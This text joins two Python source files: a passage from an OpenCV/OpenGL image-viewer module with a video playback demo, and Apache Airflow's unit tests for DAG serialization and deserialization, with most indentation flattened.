cv2.imshow(self.window_name, self.image_buffer)
else:
cv2.imshow(self.window_name, buffer)
if cv2.waitKey(8) & 0xFF == 27:
cv2.waitKey(1)
cv2.destroyAllWindows()
cv2.waitKey(1)
return
except Exception as e:
logger.warning(e)
cv2.waitKey(1)
cv2.destroyAllWindows()
cv2.waitKey(1)
return
self.image_buffer = None
else:
time.sleep(0.008)
def __gl_resize(self, Width, Height): # Retina problem.
x, y, w, h = glGetIntegerv(GL_VIEWPORT)
self.window_width = w
self.window_height = h
#glViewport(0, 0, w, h)
# glViewport(0, 0, Width, Height)
#glfwGetFramebufferSize(window, &width, &height);
# glViewport(0, 0, int(self.window_width), int(self.window_height))
def __gl_keyboard(self, key, x, y):
if type(key) == bytes:
key = ord(key)
else:
key = 0x0100 + key
if self.keyboard_listener: self.keyboard_listener(key, x, y)
        if key in (ord('q'), 0x1b, 0x03):
if self.destructor_function is not None:
logger.info("Call destructor function")
self.destructor_function()
exit(9)
return
def __gl_draw(self):
self.cnt2 += 1
if self.idle_function is not None:
try:
self.idle_function()
except:
try:
glutLeaveMainLoop()
except:
os._exit(0)
# try:
# except Exception as e:
# exit(9)
# glutDestroyWindow(self.window_name)
if self.image_buffer is not None:
try:
self.cnt += 1
if time.time() - self.tm > 1.0:
logger.info(f"\033[0KViewer[GPU]-FPS {self.cnt} Idle {self.cnt2}\033[1A")
self.tm = time.time()
self.cnt = 0
self.cnt2 = 0
for i in threading.enumerate():
if i.name == "MainThread":
if i.is_alive() is False:
exit(9)
return
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glColor3f(1.0, 1.0, 1.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(-1, 1, -1, 1, -1, 1)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, self.image_buffer.shape[1], self.image_buffer.shape[0], 0, GL_RGB, GL_UNSIGNED_BYTE, self.image_buffer)
glEnable(GL_TEXTURE_2D)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glBegin(GL_QUADS)
glTexCoord2d(0.0, 1.0)
w = self.window_width
h = self.window_height
iw = self.image_buffer.shape[1]
ih = self.image_buffer.shape[0]
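                # Letterbox: shrink the textured quad on one axis so the image
                # keeps its aspect ratio inside the window (clip space spans
                # -1..1 on both axes).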
r = w / h
ir = iw / ih
x_ratio = 1.0
y_ratio = 1.0
if r > ir:
x_ratio = ir / r
else:
y_ratio = r / ir
glVertex3d(-x_ratio, -y_ratio, 0.0)
glTexCoord2d(1.0, 1.0)
glVertex3d(x_ratio, -y_ratio, 0.0)
glTexCoord2d(1.0, 0.0)
glVertex3d(x_ratio, y_ratio, 0.0)
glTexCoord2d(0.0, 0.0)
glVertex3d(-x_ratio, y_ratio, 0.0)
glEnd()
glFlush()
if self.double_buffer:
glutSwapBuffers()
except Exception as e:
logger.error(e)
exit(9)
return
self.image_buffer = None
if time.time() - self.previous_time < 0.008:
time.sleep(0.005)
self.previous_time = time.time()
if __name__ == '__main__':
import cv2
import argparse
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
handler.setFormatter(logging.Formatter("%(asctime)s [%(filename)s:%(lineno)d] %(message)s"))
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
logger.handlers.clear()
import coloredlogs
coloredlogs.install()
parser = argparse.ArgumentParser(description='')
parser.add_argument('input', type=str, help='')
parser.add_argument('--codec', type=str, default="libx265", help='')
parser.add_argument('--quality', type=int, default=None, help='')
parser.add_argument('--quality_adjust', type=int, default=None, help='+6=low, +3=middle, high=0')
parser.add_argument('--quality_test', action='store_true')
parser.add_argument('--resolution', type=int, default=0, help='0/1280/1920')
parser.add_argument('--test', action='store_true')
parser.add_argument('--animation', action='store_true')
parser.add_argument('--volume', type=str, default=None, help='')
parser.add_argument('--disable_two_pass', action='store_true')
parser.add_argument('--generate', action='store_true')
parser.add_argument('--disable_audio_normalize', action='store_true')
args = parser.parse_args()
viewer = Viewer(cpu=False, fullscreen=False)
# viewer = Viewer(opengl_direct=False)
# viewer = Viewer(window_width=512,window_height=512,fullscreen=True,opengl_direct=True)
# viewer = Viewer(window_width=512,window_height=512,fullscreen=True,opengl_direct=False)
cap = cv2.VideoCapture(os.path.expanduser(args.input))
    if cap is None or not cap.isOpened():
logger.debug("Could not detect capture fd")
exit(9)
    def loop():
        check, frame = cap.read()
        if check:
            # cvtColor would raise on a None frame, so convert only after a
            # successful read.
            frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
            viewer.set_image(frame)
viewer.set_loop(loop)
viewer.start()
logger.debug("Main thread ended")
else:
logger.addHandler(logging.NullHandler())
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base_hook import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.operators.bash import BashOperator
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(containers=[
k8s.V1Container(
name="base",
volume_mounts=[
k8s.V1VolumeMount(
name="my-vol",
mount_path="/vol/"
)
]
)
]))
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {
"__type": "timedelta",
"__var": 300.0
}
}
},
"start_date": 1564617600.0,
'_task_group': {'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'),
'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': []},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {'__type': 'dict',
'__var': {"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod)}
}
}
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [
"can_dag_read",
"can_dag_edit"
]
}
}
}
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={
"test_role": {"can_dag_read", "can_dag_edit"}
}
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(task_id='bash_task', bash_command='echo {{ task.task_id }}', owner='airflow',
executor_config={"pod_override": executor_config_pod})
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {
'start_date': datetime(2019, 7, 10)
}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={
'hello': lambda name: 'Hello %s' % name
},
catchup=False
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=('{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}')))
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(
serialized_dags['simple_dag'],
serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(
json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"],
key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags([
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
])
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group"
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(dag, field), \
f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
                    # Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert v == serialized_dag.default_args[k], \
f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(self, serialized_task, task,):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type', 'subdag',
            # Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback', 'on_success_callback', 'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(task, field), \
f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand([
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc)),
])
def test_deserialization_start_date(self,
dag_start_date,
task_start_date,
expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
@parameterized.expand([
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc)),
(datetime(2019, 8, 1, tzinfo=timezone.utc), datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc)),
])
def test_deserialization_end_date(self,
dag_end_date,
task_end_date,
expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1),
end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand([
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
])
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand([
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}})
])
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val,
start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, [
'BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
    Class for testing purposes: allows creating objects with custom attributes in a single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand([
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(nested1=ClassWithCustomAttributes(att1="{{ task.task_id }}",
att2="{{ task.task_id }}",
template_fields=["att1"]),
nested2=ClassWithCustomAttributes(att3="{{ task.task_id }}",
att4="{{ task.task_id }}",
template_fields=["att3"]),
template_fields=["nested1"]),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', "
"'att4': '{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
])
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
        Since we don't want to inflate arbitrary python objects (it poses an RCE/security risk etc.)
        we want to check that non-"basic" objects are turned into strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_operator_subclass_changing_base_defaults(self):
assert BaseOperator(task_id='dummy').do_xcom_push is True, \
"Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual({'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream'}, fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
)
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
